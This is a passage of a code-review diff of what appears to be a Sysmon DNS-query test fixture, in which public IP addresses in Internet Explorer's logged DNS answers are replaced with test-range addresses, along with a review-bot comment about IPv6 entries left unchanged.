"{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -554,7 +554,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22" }, 
@@ -571,7 +571,7 @@
 "ProcessId": "2736",
 "QueryName": "at.atwola.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;",
+ "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "computer_name": "vagrant-2016",
@@ -592,7 +592,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
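Review bot: The IPv6 answers `2001:503:a83e::2:30`, `2001:503:231d::2:30` and `2001:503:83eb::30` in the new event.original string are left untouched although they are public addresses too, while every IPv4 entry on the same line was rewritten to 89.160.20.156 or a 192.168.0.0/16 address; the identical string recurs in the `event_data.QueryResults` hunk at -616. If the goal is that fixtures only carry addresses from the supported test subset, these need the same treatment (the permitted set includes an IPv6 block as well), and since this looks like a generated expected file the substitution should be made in the source test log and the file regenerated. Otherwise the same fixture will keep failing whichever check flagged the IPv4 values.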
@@ -616,7 +616,7 @@
 }
 },
 "event_data": {
- "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;",
+ "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:02.274",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -631,7 +631,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -652,7 +652,7 @@ "event_data": { "QueryName": "cms.analytics.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;", + "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.291", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -671,7 +671,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -681,7 +681,7 @@ "time_created": "2019-07-18T03:34:03.028Z", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.413", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -709,7 +709,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -724,7 +724,7 @@ "ProcessId": "2736", "QueryName": "g.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;", + "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "time_created": "2019-07-18T03:34:03.028Z", 
@@ -750,7 +750,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -770,7 +770,7 @@ "ProcessId": "2736", "QueryName": "lg3.media.net", "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.427", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -787,7 +787,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 